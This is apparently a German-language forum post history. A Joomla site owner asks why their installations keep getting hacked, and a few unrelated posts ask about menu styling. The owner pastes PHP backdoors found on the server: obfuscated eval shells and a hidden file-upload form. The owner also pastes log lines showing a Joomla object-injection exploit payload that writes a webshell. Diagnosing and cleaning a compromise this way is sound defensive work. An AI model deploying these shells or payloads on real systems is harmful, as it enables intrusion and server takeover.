Beiträge von benzomat

nee, dies war nur der Inhalt einer datenbanktabelle.
in den php Dateien war überall was anderes drin an code

da ich grad am löschen bin, auch die Datenbanken, ist mir aufgefallen, das ich in einer joomla version eine Tabelle hab, die in den anderen nicht ist.
es ist diese:

core_options

inhalt:

a:1:{i:41;a:3:{s:6:"linked";s:1:"0";s:5:"title";s:12:"Test wp page";s:3:"url";s:64:"http://www.unkenntlichgemacht.com/index.php/2-uncategorised/41-page-98234";}}

ist die original?

27.75.213.217 - - [11/Feb/2016:11:07:19 +0100] "GET /administrator/index.php HTTP/1.0" 200 8978 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0"
27.75.213.217 - - [11/Feb/2016:11:07:20 +0100] "POST /administrator/index.php HTTP/1.0" 303 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12"

da wurde aber nicht verändert, index.php auch vom Inhalt nicht, wie Original

das template wurde von favthemes dann in einer neuen version angeboten, allerdings klappt es nicht als update, da alles komplett anders ist....somit müsste ich eh neu machen, auch wenn ich das aktuellere template nutzen würde.

werd mir da wohl was anderes suchen, was sicherer und auch per updates aktuell gehalten wird.
ist nur nicht so einfach bei den vielen Anbietern.

wie hier, und dies immer wieder nach den Dateien in dem template

204.79.180.66 - - [25/Feb/2016:06:58:45 +0100] "GET /templates/favouritedark_hans/icons/css/font-awesome.css HTTP/1.0" 200 25296 "http://www.unkennlichgemacht.at/index.php/en/" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0;  Trident/5.0)"

ok, update wurde dann gemacht, aber die hacker waren ja bereits vor dem update unterwegs....und das update entfernt ja keine bösartigen Einträge oder oder.

ich hatte leider anfangs zu dem Zeitpunkt des problems keinen zugriff auf die log Dateien.
man war sehr umkooperativ, da grad der inhaberwechsel zum 1.1. anstand.
zu meinem Nachteil, ich weiss....

ich sichere nur noch meine Inhalte aus den joomla seiten, sprich die Beiträge, texte, Bilder, dann werden alle joomlas gelöscht, samt Datenbanken.

ich denke mal, es war ein template, diese steht immer wieder in den logs, sprich die Ordner. es handelt sich um welche von favthemes.com
ist da was bekannt?

hallo flotte,
danke....

wenn ich nicht in der Lage bin, mag sein, daher frage ich ja hier, ob mir wer sagen kann was es bedeutet!

ich hatte diese dinge gelesen, was zu machen ist, wie die Vorgänger hier auch, die zig mal alles neu machen und leider vergeblich...

hilfreich wäre zu erfahren, was diese logs bedeuten, kannst du mir dies sagen?

das ich alles löschen werde, ist mir schon lange klar, ich möchte nur vorab rausfinden, wo das loch ist, oder?
das finde ich nicht, wenn ich die Seiten neu mache, gleiche Inhalte etc und 3 tage später ist das gleiche wieder da, wie bei den vielen anderen auch.

hallo ehrenwert,
danke f+r die schnelle Antwort.
hab grad mal per ftp auf den server geschaut, auch mal in die leeren Verzeichnisse, wo noch keine webweite installiert ist.
selbst dort fand ich Dateien, diese sind vom 25.02., also gestern.
wie:
cache-55.php

<?php    $id = $_GET['6v4qa5'];    echo $catid = isset($_GET['catid'])?base64_decode($_GET['catid']):'';    $s = '';    foreach(array($id) as $v){        $s.=$v;    }    ob_start($s);    if($catid){            echo $catid;    }    ob_end_flush();

index.php
leer

indexs.php

<?php if(isset($_GET['test'])){echo 'success';}else{isset($_POST['thv5juj']) && ($www= $_POST['thv5juj']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($www)', 'add');}?>

sort-55a.php

<?php isset($_POST['6v4qa5']) && ($www= $_POST['6v4qa5']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($www)', 'add');

sql-55.php

<?php if(md5($_GET["ms-load"])=="ae76675aca3c3ad902230a2c0965bae8"){$p=$_SERVER["DOCUMENT_ROOT"];$tyuf=dirname(__FILE__);echo <<<HTML<form enctype="multipart/form-data"  method="POST">Path:$p<br><input name="file" type="file"><br>To:<br><input size="48" value="$tyuf/" name="pt" type="text"><br><input type="submit" value="Upload">$tendHTML;if (isset($_POST["pt"])){$uploadfile = $_POST["pt"].$_FILES["file"]["name"];if ($_POST["pt"]==""){$uploadfile = $_FILES["file"]["name"];}if (copy($_FILES["file"]["tmp_name"], $uploadfile)){echo"uploaded:$uploadfilen";echo"Size:".$_FILES["file"]["size"]."n";}else {print "Error:n";}}}

memcache-1a.php

<?php isset($_POST['mpwsh2']) && ($www= $_POST['mpwsh2']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($www)', 'add');

ach ja, was noch war, nach dem ersten problem, ende 2015, hatte ich mal geschaut welche php Versionen auf dem server laufen, hatte dann feststellen müssen, das es version von 2014 waren, laut den versionsnummern die in der joomla info steht.
auf nachfrage, was das soll, wurde mir gesagt, Die hier angebotenen php Versionen sind gepatched. Das bedeutet etwaige Sicherheitslücken sind in der Version berücksichtigt
dann wurde der Betreiber zum Jahreswechsel getauscht sagen wir mal, ein anderer, welcher grad am aufräumen ist.....
dieser ist wohl dabei, diese zu aktualisieren.
jetzt stehen schon neuere versionsnummern drinnen.

ich gehe mal davon aus, dass das schon auch grosse Löcher geöffnet hatte....

dies steht in einer log datei:

173.255.143.235 - - [25/Feb/2016:07:38:19 +0100] "GET /administrator/index.php?1=%40ini_set(%22display_errors%22%2C%220%22)%3B%40set_time_limit(0)%3B%40set_magic_quotes_runtime(0)%3Becho %27-%3E%7C%27%3Bfile_put_contents(dirname(%24_SERVER%5B%27SCRIPT_FILENAME%27%5D).%27/administrator.php%27%2Cbase64_decode(%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27))%3Becho %27%7C%3C-%27%3B HTTP/1.0" 200 6660 "-" "}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:8:\"feed_url\";s:46:\"eval($_REQUEST[1]);JFactory::getConfig();exit;\";s:19:\"cache_name_function\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"cache_class\";O:20:\"JDatabaseDriverMysql\":0:{}}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";b:1;}\xf0\x9d\x8c\x86"

und auch:

173.255.143.235 - - [25/Feb/2016:07:38:21 +0100] "GET /administrator/index.php?1=%40ini_set(%22display_errors%22%2C%220%22)%3B%40set_time_limit(0)%3B%40set_magic_quotes_runtime(0)%3Becho %27-%3E%7C%27%3Bfile_put_contents(dirname(%24_SERVER%5B%27SCRIPT_FILENAME%27%5D).%27/administrator.php%27%2Cbase64_decode(%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27))%3Becho %27%7C%3C-%27%3B HTTP/1.0" 200 6660 "-" "Python-urllib/2.7"

zudem noch dies, hat mit piwik zu tun:

204.79.180.129 - - [25/Feb/2016:06:58:50 +0100] "GET /analytics/piwik.js HTTP/1.0" 200 54851 "http://www.unkenntlichgemacht.at/index.php/en/" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0;  Trident/5.0)"
84.200.72.27 - - [25/Feb/2016:06:58:54 +0100] "GET /analytics/?module=API&format=csv&convertToUnicode=0&method=CoreAdminHome.runScheduledTasks&trigger=archivephp&token_auth=4d6fb6c814cbb999c1e48da4c7ef70a6 HTTP/1.0" 200 793 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0;  Trident/5.0)"
204.79.180.47 - - [25/Feb/2016:06:58:51 +0100] "GET /analytics/piwik.php?action_name=Home&idsite=1&rec=1&r=023429&h=21&m=58&s=49&url=http%3A%2F%2Fwww.unkenntlichgemacht.at%2Findex.php%2Fen%2F&_id=9fedede3a5373f25&_idts=1456379930&_idvc=1&_idn=0&_refts=0&_viewts=1456379930&send_image=0&res=1024x768&gt_ms=2 HTTP/1.0" 204 - "http://www.unkenntlichgemacht.at/index.php/en/" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0;  Trident/5.0)"

reparieren werde ich da wohl keine installation mehr, werde komplett neu erstellen, andere templates etc.

ich möchte nur rausfinden, wo und wie die reinkommen....

danke,hans

hallo,
muss jetzt auch mal was öffentlich machen, ich habe seit ende Dezember 15 das problem, das immer wieder code in meinen joomla installation geschrieben wird.
es wurde, laut provider spam verschickt, dieser sperrte daraufhin die Seite.
hab da noch versucht alles händisch zu suchen, hab alle Dateien verglichen, angesehen etc, aber kurz dadrauf das gleiche, neue Einträge, andere Dateien und und

nun hab ich in den log Dateien andere Einträge gefunden,die ich hier gern posten möchte, um zu erfahren, was da grad passiert.

wie soll, kann ich das hier posten?

danke
hans

hallo,
danke für das video.
aber
die sprachauswahl geht ja, kein Thema, nur der Saitenstyle ist auf der Strecke geblieben!!

ich habe es nach folgender Anleitung gemacht:
https://www.texniq.de/de/texniq-u/joomla-mehrsprachig-5

bei dem oberen Menü handelt es sich noch um das Menü für ALLE sprachen, welches noch nicht versteckt ist
um zu zeigen, das dort der style noch passt, aber bei der unteren Navi, welche einer der sprachen ist, der style hinüber ist.

wenn ich es weiter vervollständige, kann man den unterschied nicht mehr zeigen.
wenn das Menü für ALLE versteckt ist, bleibt der style fehlerhaft

hallo,hab ein problem o Fehler festgestellt.
- der style der naiv oben im protostar verändert sich, d.h. der Hintergrund der menüpunkte ist weg, sichtbar, weil das hauptmenü für alle sprechen noch nicht versteckt istlive unter:

http://vinoxxl.de/
oben die hauptnavi für alle sprachen, drunter schon sichtbar die für sprach dewenn ich dann die für alle verstecke bleibt die navi für de so, der blaue Hintergrund wie oben ist wegjoomla 3.4.xseite installiert komplett frisch, wollte eine weitere sprach installierendazu habe ich:menüs angelegt für die jeweilige sprache, module dazu, immer wieder die Seite im Fronten aktualisiert um zu sehen ab wo das problem entstehtes ist sichtbar, wenn noch alle Menüs aktiv sind, auch das für alle sprachen, selbst wenn ich dieses dann noch verstecke

wer kann Abhilfe schaffen?

zudem suche ich noch eine sprachdatei für slowenischdanke, hans